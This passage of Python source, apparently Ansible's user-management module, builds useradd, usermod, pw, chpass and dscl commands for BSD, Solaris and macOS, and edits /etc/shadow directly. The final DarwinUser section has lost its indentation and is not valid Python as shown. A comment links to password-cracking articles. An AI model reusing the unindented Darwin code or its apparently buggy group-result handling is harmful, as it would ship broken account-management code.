                                 preexec_fn=os.setsid,
                                 env=env)
            out_buffer = b''
            err_buffer = b''
            while p.poll() is None:
                r, w, e = select.select([master_out_fd, master_err_fd], [], [], 1)
                first_prompt = b'Enter passphrase (empty for no passphrase):'
                second_prompt = b'Enter same passphrase again'
                prompt = first_prompt
                for fd in r:
                    if fd == master_out_fd:
                        chunk = os.read(master_out_fd, 10240)
                        out_buffer += chunk
                        if prompt in out_buffer:
                            os.write(master_in_fd, to_bytes(self.ssh_passphrase, errors='strict') + b'\r')
                            prompt = second_prompt
                    else:
                        chunk = os.read(master_err_fd, 10240)
                        err_buffer += chunk
                        if prompt in err_buffer:
                            os.write(master_in_fd, to_bytes(self.ssh_passphrase, errors='strict') + b'\r')
                            prompt = second_prompt
                if b'Overwrite (y/n)?' in out_buffer or b'Overwrite (y/n)?' in err_buffer:
                    # The key was created between us checking for existence and now
                    return (None, 'Key already exists', '')
            rc = p.returncode
            out = to_native(out_buffer)
            err = to_native(err_buffer)
        except OSError as e:
            return (1, '', to_native(e))
    else:
        cmd.append('-N')
        cmd.append('')
        (rc, out, err) = self.execute_command(cmd, data=overwrite)
    if rc == 0 and not self.module.check_mode:
        # If the keys were successfully created, we should be able
        # to tweak ownership.
        os.chown(ssh_key_file, info[2], info[3])
        os.chown('%s.pub' % ssh_key_file, info[2], info[3])
    return (rc, out, err)
def ssh_key_fingerprint(self):
    """Return (rc, out, err) from running ``ssh-keygen -l`` on the key file."""
    key_file = self.get_ssh_key_path()
    if not os.path.exists(key_file):
        return (1, 'SSH Key file %s does not exist' % key_file, '')
    keygen = self.module.get_bin_path('ssh-keygen', True)
    return self.execute_command([keygen, '-l', '-f', key_file], obey_checkmode=False)
def get_ssh_public_key(self):
    """Return the stripped contents of the user's public key file, or None."""
    pub_path = '%s.pub' % self.get_ssh_key_path()
    try:
        with open(pub_path, 'r') as handle:
            return handle.read().strip()
    except IOError:
        return None
def create_user(self):
    """Default backend dispatcher; platform subclasses may override."""
    # by default we use the create_user_useradd method
    return self.create_user_useradd()

def remove_user(self):
    """Default backend dispatcher; platform subclasses may override."""
    # by default we use the remove_user_userdel method
    return self.remove_user_userdel()

def modify_user(self):
    """Default backend dispatcher; platform subclasses may override."""
    # by default we use the modify_user_usermod method
    return self.modify_user_usermod()
def create_homedir(self, path):
    """Create the user's home directory when it does not yet exist.

    Populates it from the skeleton directory (``self.skeleton`` or
    /etc/skel) when one is available, then applies the mode derived from
    the UMASK setting in LOGIN_DEFS.  Exits the module on any OS error.
    """
    if not os.path.exists(path):
        if self.skeleton is not None:
            skeleton = self.skeleton
        else:
            skeleton = '/etc/skel'
        if os.path.exists(skeleton):
            try:
                shutil.copytree(skeleton, path, symlinks=True)
            except OSError as e:
                self.module.exit_json(failed=True, msg="%s" % to_native(e))
        else:
            try:
                os.makedirs(path)
            except OSError as e:
                self.module.exit_json(failed=True, msg="%s" % to_native(e))
        # get umask from /etc/login.defs and set correct home mode
        if os.path.exists(self.LOGIN_DEFS):
            with open(self.LOGIN_DEFS, 'r') as f:
                for line in f:
                    m = re.match(r'^UMASK\s+(\d+)$', line)
                    if m:
                        # UMASK value is octal; home mode is 0777 minus it
                        umask = int(m.group(1), 8)
                        mode = 0o777 & ~umask
                        try:
                            os.chmod(path, mode)
                        except OSError as e:
                            self.module.exit_json(failed=True, msg="%s" % to_native(e))
def chown_homedir(self, uid, gid, path):
    """Recursively chown ``path`` and everything under it to uid:gid.

    Exits the module on any OS error (e.g. insufficient privileges).
    """
    try:
        os.chown(path, uid, gid)
        for root, dirs, files in os.walk(path):
            for entry in dirs + files:
                os.chown(os.path.join(root, entry), uid, gid)
    except OSError as e:
        self.module.exit_json(failed=True, msg="%s" % to_native(e))
# ===========================================
# ===========================================
class FreeBsdUser(User):
    """
    This is a FreeBSD User manipulation class - it uses the pw command
    to manipulate the user database, followed by the chpass command
    to change the password.

    This overrides the following methods from the generic class:-
      - create_user()
      - remove_user()
      - modify_user()
    """

    platform = 'FreeBSD'
    distribution = None
    SHADOWFILE = '/etc/master.passwd'
    # master.passwd field 6 holds the account expiry, in seconds since Epoch
    SHADOWFILE_EXPIRE_INDEX = 6
    DATE_FORMAT = '%d-%b-%Y'

    def remove_user(self):
        # Delete the account with ``pw userdel``; -r also removes the home dir.
        cmd = [
            self.module.get_bin_path('pw', True),
            'userdel',
            '-n',
            self.name
        ]
        if self.remove:
            cmd.append('-r')
        return self.execute_command(cmd)

    def create_user(self):
        # Create the account with ``pw useradd``.  The password hash is set
        # afterwards via a separate chpass invocation.
        cmd = [
            self.module.get_bin_path('pw', True),
            'useradd',
            '-n',
            self.name,
        ]
        if self.uid is not None:
            cmd.append('-u')
            cmd.append(self.uid)
            # -o (non-unique uid) is only meaningful together with -u
            if self.non_unique:
                cmd.append('-o')
        if self.comment is not None:
            cmd.append('-c')
            cmd.append(self.comment)
        if self.home is not None:
            cmd.append('-d')
            cmd.append(self.home)
        if self.group is not None:
            if not self.group_exists(self.group):
                self.module.fail_json(msg="Group %s does not exist" % self.group)
            cmd.append('-g')
            cmd.append(self.group)
        if self.groups is not None:
            groups = self.get_groups_set()
            cmd.append('-G')
            cmd.append(','.join(groups))
        if self.create_home:
            cmd.append('-m')
            if self.skeleton is not None:
                cmd.append('-k')
                cmd.append(self.skeleton)
        if self.shell is not None:
            cmd.append('-s')
            cmd.append(self.shell)
        if self.login_class is not None:
            cmd.append('-L')
            cmd.append(self.login_class)
        if self.expires is not None:
            cmd.append('-e')
            # a pre-Epoch expiry means "disable expiration" (0 on BSD)
            if self.expires < time.gmtime(0):
                cmd.append('0')
            else:
                cmd.append(str(calendar.timegm(self.expires)))
        # system cannot be handled currently - should we error if its requested?
        # create the user
        (rc, out, err) = self.execute_command(cmd)
        if rc is not None and rc != 0:
            self.module.fail_json(name=self.name, msg=err, rc=rc)
        # we have to set the password in a second command
        if self.password is not None:
            cmd = [
                self.module.get_bin_path('chpass', True),
                '-p',
                self.password,
                self.name
            ]
            return self.execute_command(cmd)
        return (rc, out, err)

    def modify_user(self):
        # Build a ``pw usermod`` invocation containing only the options whose
        # requested value differs from the current account state.
        cmd = [
            self.module.get_bin_path('pw', True),
            'usermod',
            '-n',
            self.name
        ]
        # remember the base length so we can tell later whether anything was added
        cmd_len = len(cmd)
        info = self.user_info()
        if self.uid is not None and info[2] != int(self.uid):
            cmd.append('-u')
            cmd.append(self.uid)
            if self.non_unique:
                cmd.append('-o')
        if self.comment is not None and info[4] != self.comment:
            cmd.append('-c')
            cmd.append(self.comment)
        if self.home is not None:
            if (info[5] != self.home and self.move_home) or (not os.path.exists(self.home) and self.create_home):
                cmd.append('-m')
            if info[5] != self.home:
                cmd.append('-d')
                cmd.append(self.home)
            if self.skeleton is not None:
                cmd.append('-k')
                cmd.append(self.skeleton)
        if self.group is not None:
            if not self.group_exists(self.group):
                self.module.fail_json(msg="Group %s does not exist" % self.group)
            ginfo = self.group_info(self.group)
            if info[3] != ginfo[2]:
                cmd.append('-g')
                cmd.append(self.group)
        if self.shell is not None and info[6] != self.shell:
            cmd.append('-s')
            cmd.append(self.shell)
        if self.login_class is not None:
            # find current login class
            user_login_class = None
            if os.path.exists(self.SHADOWFILE) and os.access(self.SHADOWFILE, os.R_OK):
                with open(self.SHADOWFILE, 'r') as f:
                    for line in f:
                        if line.startswith('%s:' % self.name):
                            user_login_class = line.split(':')[4]
            # act only if login_class change
            if self.login_class != user_login_class:
                cmd.append('-L')
                cmd.append(self.login_class)
        if self.groups is not None:
            current_groups = self.user_group_membership()
            groups = self.get_groups_set()
            group_diff = set(current_groups).symmetric_difference(groups)
            groups_need_mod = False
            if group_diff:
                if self.append:
                    for g in groups:
                        if g in group_diff:
                            groups_need_mod = True
                            break
                else:
                    groups_need_mod = True
            if groups_need_mod:
                cmd.append('-G')
                new_groups = groups
                if self.append:
                    # pw -G replaces the list, so merge in the current groups
                    new_groups = groups | set(current_groups)
                cmd.append(','.join(new_groups))
        if self.expires is not None:
            current_expires = int(self.user_password()[1])
            # If expiration is negative or zero and the current expiration is greater than zero, disable expiration.
            # In OpenBSD, setting expiration to zero disables expiration. It does not expire the account.
            if self.expires <= time.gmtime(0):
                if current_expires > 0:
                    cmd.append('-e')
                    cmd.append('0')
            else:
                # master.passwd stores the expiry in seconds since Epoch already
                current_expire_date = time.gmtime(current_expires)
                # Current expires is negative or we compare year, month, and day only
                if current_expires <= 0 or current_expire_date[:3] != self.expires[:3]:
                    cmd.append('-e')
                    cmd.append(str(calendar.timegm(self.expires)))
        # modify the user if cmd will do anything
        if cmd_len != len(cmd):
            (rc, out, err) = self.execute_command(cmd)
            if rc is not None and rc != 0:
                self.module.fail_json(name=self.name, msg=err, rc=rc)
        else:
            (rc, out, err) = (None, '', '')
        # we have to set the password in a second command
        if self.update_password == 'always' and self.password is not None and info[1] != self.password:
            cmd = [
                self.module.get_bin_path('chpass', True),
                '-p',
                self.password,
                self.name
            ]
            return self.execute_command(cmd)
        # we have to lock/unlock the password in a distinct command
        if self.password_lock and not info[1].startswith('*LOCKED*'):
            cmd = [
                self.module.get_bin_path('pw', True),
                'lock',
                self.name
            ]
            if self.uid is not None and info[2] != int(self.uid):
                cmd.append('-u')
                cmd.append(self.uid)
            return self.execute_command(cmd)
        elif self.password_lock is False and info[1].startswith('*LOCKED*'):
            cmd = [
                self.module.get_bin_path('pw', True),
                'unlock',
                self.name
            ]
            if self.uid is not None and info[2] != int(self.uid):
                cmd.append('-u')
                cmd.append(self.uid)
            return self.execute_command(cmd)
        return (rc, out, err)
class DragonFlyBsdUser(FreeBsdUser):
    """
    This is a DragonFlyBSD User manipulation class - it inherits the
    FreeBsdUser class behaviors, such as using the pw command to
    manipulate the user database, followed by the chpass command
    to change the password.
    """

    # only the platform key differs; all behavior comes from FreeBsdUser
    platform = 'DragonFly'
class OpenBSDUser(User):
    """
    This is a OpenBSD User manipulation class.
    Main differences are that OpenBSD:-
     - has no concept of "system" account.
     - has no force delete user

    This overrides the following methods from the generic class:-
      - create_user()
      - remove_user()
      - modify_user()
    """

    platform = 'OpenBSD'
    distribution = None
    SHADOWFILE = '/etc/master.passwd'

    def create_user(self):
        # Build a useradd command with only the requested options.
        cmd = [self.module.get_bin_path('useradd', True)]
        if self.uid is not None:
            cmd.append('-u')
            cmd.append(self.uid)
            # -o (non-unique uid) is only meaningful together with -u
            if self.non_unique:
                cmd.append('-o')
        if self.group is not None:
            if not self.group_exists(self.group):
                self.module.fail_json(msg="Group %s does not exist" % self.group)
            cmd.append('-g')
            cmd.append(self.group)
        if self.groups is not None:
            groups = self.get_groups_set()
            cmd.append('-G')
            cmd.append(','.join(groups))
        if self.comment is not None:
            cmd.append('-c')
            cmd.append(self.comment)
        if self.home is not None:
            cmd.append('-d')
            cmd.append(self.home)
        if self.shell is not None:
            cmd.append('-s')
            cmd.append(self.shell)
        if self.login_class is not None:
            cmd.append('-L')
            cmd.append(self.login_class)
        # '*' is the locked placeholder, not a hash — don't pass it through
        if self.password is not None and self.password != '*':
            cmd.append('-p')
            cmd.append(self.password)
        if self.create_home:
            cmd.append('-m')
            if self.skeleton is not None:
                cmd.append('-k')
                cmd.append(self.skeleton)
        cmd.append(self.name)
        return self.execute_command(cmd)

    def remove_user_userdel(self):
        # OpenBSD userdel has no force option; -r removes the home directory.
        cmd = [self.module.get_bin_path('userdel', True)]
        if self.remove:
            cmd.append('-r')
        cmd.append(self.name)
        return self.execute_command(cmd)

    def modify_user(self):
        # Build a usermod command containing only the options whose requested
        # value differs from the current account state.
        cmd = [self.module.get_bin_path('usermod', True)]
        info = self.user_info()
        if self.uid is not None and info[2] != int(self.uid):
            cmd.append('-u')
            cmd.append(self.uid)
            if self.non_unique:
                cmd.append('-o')
        if self.group is not None:
            if not self.group_exists(self.group):
                self.module.fail_json(msg="Group %s does not exist" % self.group)
            ginfo = self.group_info(self.group)
            if info[3] != ginfo[2]:
                cmd.append('-g')
                cmd.append(self.group)
        if self.groups is not None:
            current_groups = self.user_group_membership()
            groups_need_mod = False
            # -S replaces the supplementary list, -G appends to it
            groups_option = '-S'
            groups = []
            if self.groups == '':
                if current_groups and not self.append:
                    groups_need_mod = True
            else:
                groups = self.get_groups_set()
                group_diff = set(current_groups).symmetric_difference(groups)
                if group_diff:
                    if self.append:
                        for g in groups:
                            if g in group_diff:
                                groups_option = '-G'
                                groups_need_mod = True
                                break
                    else:
                        groups_need_mod = True
            if groups_need_mod:
                cmd.append(groups_option)
                cmd.append(','.join(groups))
        if self.comment is not None and info[4] != self.comment:
            cmd.append('-c')
            cmd.append(self.comment)
        if self.home is not None and info[5] != self.home:
            if self.move_home:
                cmd.append('-m')
            cmd.append('-d')
            cmd.append(self.home)
        if self.shell is not None and info[6] != self.shell:
            cmd.append('-s')
            cmd.append(self.shell)
        if self.login_class is not None:
            # find current login class
            user_login_class = None
            userinfo_cmd = [self.module.get_bin_path('userinfo', True), self.name]
            (rc, out, err) = self.execute_command(userinfo_cmd, obey_checkmode=False)
            for line in out.splitlines():
                tokens = line.split()
                if tokens[0] == 'class' and len(tokens) == 2:
                    user_login_class = tokens[1]
            # act only if login_class change
            if self.login_class != user_login_class:
                cmd.append('-L')
                cmd.append(self.login_class)
        # a leading '*' in the hash marks a locked/disabled password
        if self.password_lock and not info[1].startswith('*'):
            cmd.append('-Z')
        elif self.password_lock is False and info[1].startswith('*'):
            cmd.append('-U')
        if self.update_password == 'always' and self.password is not None \
                and self.password != '*' and info[1] != self.password:
            cmd.append('-p')
            cmd.append(self.password)
        # skip if no changes to be made
        if len(cmd) == 1:
            return (None, '', '')
        cmd.append(self.name)
        return self.execute_command(cmd)
class NetBSDUser(User):
    """
    This is a NetBSD User manipulation class.
    Main differences are that NetBSD:-
     - has no concept of "system" account.
     - has no force delete user

    This overrides the following methods from the generic class:-
      - create_user()
      - remove_user()
      - modify_user()
    """

    platform = 'NetBSD'
    distribution = None
    SHADOWFILE = '/etc/master.passwd'

    def create_user(self):
        # Build a useradd command with only the requested options.
        cmd = [self.module.get_bin_path('useradd', True)]
        if self.uid is not None:
            cmd.append('-u')
            cmd.append(self.uid)
            # -o (non-unique uid) is only meaningful together with -u
            if self.non_unique:
                cmd.append('-o')
        if self.group is not None:
            if not self.group_exists(self.group):
                self.module.fail_json(msg="Group %s does not exist" % self.group)
            cmd.append('-g')
            cmd.append(self.group)
        if self.groups is not None:
            groups = self.get_groups_set()
            # NetBSD limits a user to 16 supplementary groups
            if len(groups) > 16:
                self.module.fail_json(msg="Too many groups (%d) NetBSD allows for 16 max." % len(groups))
            cmd.append('-G')
            cmd.append(','.join(groups))
        if self.comment is not None:
            cmd.append('-c')
            cmd.append(self.comment)
        if self.home is not None:
            cmd.append('-d')
            cmd.append(self.home)
        if self.shell is not None:
            cmd.append('-s')
            cmd.append(self.shell)
        if self.login_class is not None:
            cmd.append('-L')
            cmd.append(self.login_class)
        if self.password is not None:
            cmd.append('-p')
            cmd.append(self.password)
        if self.create_home:
            cmd.append('-m')
            if self.skeleton is not None:
                cmd.append('-k')
                cmd.append(self.skeleton)
        cmd.append(self.name)
        return self.execute_command(cmd)

    def remove_user_userdel(self):
        # NetBSD userdel has no force option; -r removes the home directory.
        cmd = [self.module.get_bin_path('userdel', True)]
        if self.remove:
            cmd.append('-r')
        cmd.append(self.name)
        return self.execute_command(cmd)

    def modify_user(self):
        # Build a usermod command containing only the options whose requested
        # value differs from the current account state.
        cmd = [self.module.get_bin_path('usermod', True)]
        info = self.user_info()
        if self.uid is not None and info[2] != int(self.uid):
            cmd.append('-u')
            cmd.append(self.uid)
            if self.non_unique:
                cmd.append('-o')
        if self.group is not None:
            if not self.group_exists(self.group):
                self.module.fail_json(msg="Group %s does not exist" % self.group)
            ginfo = self.group_info(self.group)
            if info[3] != ginfo[2]:
                cmd.append('-g')
                cmd.append(self.group)
        if self.groups is not None:
            current_groups = self.user_group_membership()
            groups_need_mod = False
            groups = []
            if self.groups == '':
                if current_groups and not self.append:
                    groups_need_mod = True
            else:
                groups = self.get_groups_set()
                group_diff = set(current_groups).symmetric_difference(groups)
                if group_diff:
                    if self.append:
                        for g in groups:
                            if g in group_diff:
                                # usermod -G replaces the list; merge in current groups
                                groups = set(current_groups).union(groups)
                                groups_need_mod = True
                                break
                    else:
                        groups_need_mod = True
            if groups_need_mod:
                if len(groups) > 16:
                    self.module.fail_json(msg="Too many groups (%d) NetBSD allows for 16 max." % len(groups))
                cmd.append('-G')
                cmd.append(','.join(groups))
        if self.comment is not None and info[4] != self.comment:
            cmd.append('-c')
            cmd.append(self.comment)
        if self.home is not None and info[5] != self.home:
            if self.move_home:
                cmd.append('-m')
            cmd.append('-d')
            cmd.append(self.home)
        if self.shell is not None and info[6] != self.shell:
            cmd.append('-s')
            cmd.append(self.shell)
        if self.login_class is not None:
            cmd.append('-L')
            cmd.append(self.login_class)
        if self.update_password == 'always' and self.password is not None and info[1] != self.password:
            cmd.append('-p')
            cmd.append(self.password)
        # BUGFIX: the option and its value must be separate argv elements;
        # run_command() receives a list and does not tokenize, so the former
        # single string '-C yes' was passed to usermod as one (invalid) argument.
        if self.password_lock and not info[1].startswith('*LOCKED*'):
            cmd.append('-C')
            cmd.append('yes')
        elif self.password_lock is False and info[1].startswith('*LOCKED*'):
            cmd.append('-C')
            cmd.append('no')
        # skip if no changes to be made
        if len(cmd) == 1:
            return (None, '', '')
        cmd.append(self.name)
        return self.execute_command(cmd)
class SunOS(User):
    """
    This is a SunOS User manipulation class - The main difference between
    this class and the generic user class is that Solaris-type distros
    don't support the concept of a "system" account and we need to
    edit the /etc/shadow file manually to set a password. (Ugh)

    This overrides the following methods from the generic class:-
      - create_user()
      - remove_user()
      - modify_user()
      - user_info()
    """

    platform = 'SunOS'
    distribution = None
    SHADOWFILE = '/etc/shadow'
    USER_ATTR = '/etc/user_attr'

    def get_password_defaults(self):
        # Read password aging defaults (MINWEEKS/MAXWEEKS/WARNWEEKS)
        # from /etc/default/passwd; empty strings when unset.
        try:
            minweeks = ''
            maxweeks = ''
            warnweeks = ''
            with open("/etc/default/passwd", 'r') as f:
                for line in f:
                    line = line.strip()
                    if (line.startswith('#') or line == ''):
                        continue
                    m = re.match(r'^([^#]*)#(.*)$', line)
                    if m:  # The line contains a hash / comment
                        line = m.group(1)
                    key, value = line.split('=')
                    if key == "MINWEEKS":
                        minweeks = value.rstrip('\n')
                    elif key == "MAXWEEKS":
                        maxweeks = value.rstrip('\n')
                    elif key == "WARNWEEKS":
                        warnweeks = value.rstrip('\n')
        except Exception as err:
            self.module.fail_json(msg="failed to read /etc/default/passwd: %s" % to_native(err))
        return (minweeks, maxweeks, warnweeks)

    def remove_user(self):
        # Delete the account; -r also removes the home directory.
        cmd = [self.module.get_bin_path('userdel', True)]
        if self.remove:
            cmd.append('-r')
        cmd.append(self.name)
        return self.execute_command(cmd)

    def create_user(self):
        # Build and run a useradd command, then write the password hash
        # directly into /etc/shadow (Solaris useradd cannot take a hash).
        cmd = [self.module.get_bin_path('useradd', True)]
        if self.uid is not None:
            cmd.append('-u')
            cmd.append(self.uid)
            # -o (non-unique uid) is only meaningful together with -u
            if self.non_unique:
                cmd.append('-o')
        if self.group is not None:
            if not self.group_exists(self.group):
                self.module.fail_json(msg="Group %s does not exist" % self.group)
            cmd.append('-g')
            cmd.append(self.group)
        if self.groups is not None:
            groups = self.get_groups_set()
            cmd.append('-G')
            cmd.append(','.join(groups))
        if self.comment is not None:
            cmd.append('-c')
            cmd.append(self.comment)
        if self.home is not None:
            cmd.append('-d')
            cmd.append(self.home)
        if self.shell is not None:
            cmd.append('-s')
            cmd.append(self.shell)
        if self.create_home:
            cmd.append('-m')
            if self.skeleton is not None:
                cmd.append('-k')
                cmd.append(self.skeleton)
        if self.profile is not None:
            cmd.append('-P')
            cmd.append(self.profile)
        if self.authorization is not None:
            cmd.append('-A')
            cmd.append(self.authorization)
        if self.role is not None:
            cmd.append('-R')
            cmd.append(self.role)
        cmd.append(self.name)
        (rc, out, err) = self.execute_command(cmd)
        if rc is not None and rc != 0:
            self.module.fail_json(name=self.name, msg=err, rc=rc)
        if not self.module.check_mode:
            # we have to set the password by editing the /etc/shadow file
            if self.password is not None:
                self.backup_shadow()
                minweeks, maxweeks, warnweeks = self.get_password_defaults()
                try:
                    lines = []
                    with open(self.SHADOWFILE, 'rb') as f:
                        for line in f:
                            line = to_native(line, errors='surrogate_or_strict')
                            fields = line.strip().split(':')
                            if not fields[0] == self.name:
                                lines.append(line)
                                continue
                            fields[1] = self.password
                            # lastchg field: days since Epoch
                            fields[2] = str(int(time.time() // 86400))
                            if minweeks:
                                try:
                                    fields[3] = str(int(minweeks) * 7)
                                except ValueError:
                                    # mirror solaris, which allows for any value in this field, and ignores anything that is not an int.
                                    pass
                            if maxweeks:
                                try:
                                    fields[4] = str(int(maxweeks) * 7)
                                except ValueError:
                                    # mirror solaris, which allows for any value in this field, and ignores anything that is not an int.
                                    pass
                            if warnweeks:
                                try:
                                    fields[5] = str(int(warnweeks) * 7)
                                except ValueError:
                                    # mirror solaris, which allows for any value in this field, and ignores anything that is not an int.
                                    pass
                            line = ':'.join(fields)
                            lines.append('%s\n' % line)
                    with open(self.SHADOWFILE, 'w+') as f:
                        f.writelines(lines)
                except Exception as err:
                    self.module.fail_json(msg="failed to update users password: %s" % to_native(err))
        return (rc, out, err)

    def modify_user_usermod(self):
        # Build a usermod command containing only the options whose requested
        # value differs from the current state, then update /etc/shadow
        # directly when the password must change.
        cmd = [self.module.get_bin_path('usermod', True)]
        cmd_len = len(cmd)
        info = self.user_info()
        if self.uid is not None and info[2] != int(self.uid):
            cmd.append('-u')
            cmd.append(self.uid)
            if self.non_unique:
                cmd.append('-o')
        if self.group is not None:
            if not self.group_exists(self.group):
                self.module.fail_json(msg="Group %s does not exist" % self.group)
            ginfo = self.group_info(self.group)
            if info[3] != ginfo[2]:
                cmd.append('-g')
                cmd.append(self.group)
        if self.groups is not None:
            current_groups = self.user_group_membership()
            groups = self.get_groups_set()
            group_diff = set(current_groups).symmetric_difference(groups)
            groups_need_mod = False
            if group_diff:
                if self.append:
                    for g in groups:
                        if g in group_diff:
                            groups_need_mod = True
                            break
                else:
                    groups_need_mod = True
            if groups_need_mod:
                cmd.append('-G')
                new_groups = groups
                if self.append:
                    # usermod -G replaces the list; merge in current groups
                    new_groups.update(current_groups)
                cmd.append(','.join(new_groups))
        if self.comment is not None and info[4] != self.comment:
            cmd.append('-c')
            cmd.append(self.comment)
        if self.home is not None and info[5] != self.home:
            if self.move_home:
                cmd.append('-m')
            cmd.append('-d')
            cmd.append(self.home)
        if self.shell is not None and info[6] != self.shell:
            cmd.append('-s')
            cmd.append(self.shell)
        # indexes 7-9 are profiles/auths/roles appended by user_info() below
        if self.profile is not None and info[7] != self.profile:
            cmd.append('-P')
            cmd.append(self.profile)
        if self.authorization is not None and info[8] != self.authorization:
            cmd.append('-A')
            cmd.append(self.authorization)
        if self.role is not None and info[9] != self.role:
            cmd.append('-R')
            cmd.append(self.role)
        # modify the user if cmd will do anything
        if cmd_len != len(cmd):
            cmd.append(self.name)
            (rc, out, err) = self.execute_command(cmd)
            if rc is not None and rc != 0:
                self.module.fail_json(name=self.name, msg=err, rc=rc)
        else:
            (rc, out, err) = (None, '', '')
        # we have to set the password by editing the /etc/shadow file
        if self.update_password == 'always' and self.password is not None and info[1] != self.password:
            self.backup_shadow()
            (rc, out, err) = (0, '', '')
            if not self.module.check_mode:
                minweeks, maxweeks, warnweeks = self.get_password_defaults()
                try:
                    lines = []
                    with open(self.SHADOWFILE, 'rb') as f:
                        for line in f:
                            line = to_native(line, errors='surrogate_or_strict')
                            fields = line.strip().split(':')
                            if not fields[0] == self.name:
                                lines.append(line)
                                continue
                            fields[1] = self.password
                            fields[2] = str(int(time.time() // 86400))
                            if minweeks:
                                fields[3] = str(int(minweeks) * 7)
                            if maxweeks:
                                fields[4] = str(int(maxweeks) * 7)
                            if warnweeks:
                                fields[5] = str(int(warnweeks) * 7)
                            line = ':'.join(fields)
                            lines.append('%s\n' % line)
                    with open(self.SHADOWFILE, 'w+') as f:
                        f.writelines(lines)
                    rc = 0
                except Exception as err:
                    self.module.fail_json(msg="failed to update users password: %s" % to_native(err))
        return (rc, out, err)

    def user_info(self):
        # Extend the generic passwd-based info with the three
        # /etc/user_attr fields (profiles, auths, roles).
        info = super(SunOS, self).user_info()
        if info:
            info += self._user_attr_info()
        return info

    def _user_attr_info(self):
        # Return [profiles, auths, roles] for the user from /etc/user_attr;
        # empty strings when the user has no entry.
        info = [''] * 3
        with open(self.USER_ATTR, 'r') as file_handler:
            for line in file_handler:
                lines = line.strip().split('::::')
                if lines[0] == self.name:
                    tmp = dict(x.split('=') for x in lines[1].split(';'))
                    info[0] = tmp.get('profiles', '')
                    info[1] = tmp.get('auths', '')
                    info[2] = tmp.get('roles', '')
        return info
class DarwinUser(User):
"""
This is a Darwin macOS User manipulation class.
Main differences are that Darwin:-
- Handles accounts in a database managed by dscl(1)
- Has no useradd/groupadd
- Does not create home directories
- User password must be cleartext
- UID must be given
- System users must ben under 500
This overrides the following methods from the generic class:-
- user_exists()
- create_user()
- remove_user()
- modify_user()
"""
platform = 'Darwin'
distribution = None
SHADOWFILE = None
dscl_directory = '.'
fields = [
('comment', 'RealName'),
('home', 'NFSHomeDirectory'),
('shell', 'UserShell'),
('uid', 'UniqueID'),
('group', 'PrimaryGroupID'),
('hidden', 'IsHidden'),
]
def __init__(self, module):
super(DarwinUser, self).__init__(module)
# make the user hidden if option is set or deffer to system option
if self.hidden is None:
if self.system:
self.hidden = 1
elif self.hidden:
self.hidden = 1
else:
self.hidden = 0
# add hidden to processing if set
if self.hidden is not None:
self.fields.append(('hidden', 'IsHidden'))
def _get_dscl(self):
return [self.module.get_bin_path('dscl', True), self.dscl_directory]
def _list_user_groups(self):
cmd = self._get_dscl()
cmd += ['-search', '/Groups', 'GroupMembership', self.name]
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
groups = []
for line in out.splitlines():
if line.startswith(' ') or line.startswith(')'):
continue
groups.append(line.split()[0])
return groups
def _get_user_property(self, property):
'''Return user PROPERTY as given my dscl(1) read or None if not found.'''
cmd = self._get_dscl()
cmd += ['-read', '/Users/%s' % self.name, property]
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
if rc != 0:
return None
# from dscl(1)
# if property contains embedded spaces, the list will instead be
# displayed one entry per line, starting on the line after the key.
lines = out.splitlines()
# sys.stderr.write('*** |%s| %s -> %s\n' % (property, out, lines))
if len(lines) == 1:
return lines[0].split(': ')[1]
else:
if len(lines) > 2:
return '\n'.join([lines[1].strip()] + lines[2:])
else:
if len(lines) == 2:
return lines[1].strip()
else:
return None
def _get_next_uid(self, system=None):
'''
Return the next available uid. If system=True, then
uid should be below of 500, if possible.
'''
cmd = self._get_dscl()
cmd += ['-list', '/Users', 'UniqueID']
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
if rc != 0:
self.module.fail_json(
msg="Unable to get the next available uid",
rc=rc,
out=out,
err=err
)
max_uid = 0
max_system_uid = 0
for line in out.splitlines():
current_uid = int(line.split(' ')[-1])
if max_uid < current_uid:
max_uid = current_uid
if max_system_uid < current_uid and current_uid < 500:
max_system_uid = current_uid
if system and (0 < max_system_uid < 499):
return max_system_uid + 1
return max_uid + 1
def _change_user_password(self):
'''Change password for SELF.NAME against SELF.PASSWORD.
Please note that password must be cleartext.
'''
# some documentation on how is stored passwords on OSX:
# http://blog.lostpassword.com/2012/07/cracking-mac-os-x-lion-accounts-passwords/
# http://null-byte.wonderhowto.com/how-to/hack-mac-os-x-lion-passwords-0130036/
# http://pastebin.com/RYqxi7Ca
# on OSX 10.8+ hash is SALTED-SHA512-PBKDF2
# https://pythonhosted.org/passlib/lib/passlib.hash.pbkdf2_digest.html
# https://gist.github.com/nueh/8252572
cmd = self._get_dscl()
if self.password:
cmd += ['-passwd', '/Users/%s' % self.name, self.password]
else:
cmd += ['-create', '/Users/%s' % self.name, 'Password', '*']
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Error when changing password', err=err, out=out, rc=rc)
return (rc, out, err)
def _make_group_numerical(self):
'''Convert SELF.GROUP to is stringed numerical value suitable for dscl.'''
if self.group is None:
self.group = 'nogroup'
try:
self.group = grp.getgrnam(self.group).gr_gid
except KeyError:
self.module.fail_json(msg='Group "%s" not found. Try to create it first using "group" module.' % self.group)
# We need to pass a string to dscl
self.group = str(self.group)
def __modify_group(self, group, action):
'''Add or remove SELF.NAME to or from GROUP depending on ACTION.
ACTION can be 'add' or 'remove' otherwise 'remove' is assumed. '''
if action == 'add':
option = '-a'
else:
option = '-d'
cmd = ['dseditgroup', '-o', 'edit', option, self.name, '-t', 'user', group]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot %s user "%s" to group "%s".'
% (action, self.name, group), err=err, out=out, rc=rc)
return (rc, out, err)
def _modify_group(self):
'''Add or remove SELF.NAME to or from GROUP depending on ACTION.
ACTION can be 'add' or 'remove' otherwise 'remove' is assumed. '''
rc = 0
out = ''
err = ''
changed = False
current = set(self._list_user_groups())
if self.groups is not None:
target = set(self.groups.split(','))
else:
target = set([])
if self.append is False:
for remove in current - target:
(_rc, _err, _out) = self.__modify_group(remove, 'delete')
rc += rc
out += _out
err += _err
changed = True
for add in target - current:
(_rc, _err, _out) = self.__modify_group(add, 'add')
rc += _rc
out += _out
err += _err
changed = True
return (rc, err, out, changed)
def _update_system_user(self):
'''Hide or show user on login window according SELF.SYSTEM.
Returns 0 if a change has been made, None otherwise.'''
plist_file = '/Library/Preferences/com.apple.loginwindow.plist'
# http://support.apple.com/kb/HT5017?viewlocale=en_US
